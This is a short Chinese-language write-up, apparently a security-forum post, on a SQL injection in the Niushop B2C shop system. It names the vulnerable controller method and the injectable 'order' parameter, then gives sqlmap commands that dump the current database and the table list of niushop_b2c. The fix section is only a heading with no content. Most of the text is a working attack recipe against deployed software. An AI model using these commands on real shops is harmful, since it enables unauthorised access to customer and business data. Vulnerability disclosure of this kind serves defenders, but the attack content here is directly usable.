0x01 前言

Niushop B2C商城系统基于ThinkPHP5.0开发，源码全部开放(100%)，商用免费，四网合一，满足用户、企业、开发者、服务商等角色要求

0x02 代码分析

跟踪到/Application/wap/Controller/Goods.php中的goodsSearchList方法

sear_name=&sear_type=1&order=*&sort=asc&controlType=&shop_id=0&page=1

将数据包保存为niushop.txt

sqlmap -r niushop.txt --random-agent --batch --dbms "mysql"

![image.png](https://xzfile.aliyuncs.com/media/upload/picture/20191113164541-f90bf8ec-05f1-1.png)

sqlmap -r niushop.txt --random-agent --batch --dbms "mysql" --current-db

![image.png](https://xzfile.aliyuncs.com/media/upload/picture/20191113164614-0d014a28-05f2-1.png)

sqlmap -r niushop.txt --random-agent --batch --dbms "mysql" -D niushop_b2c --tables
```

0x05 漏洞修复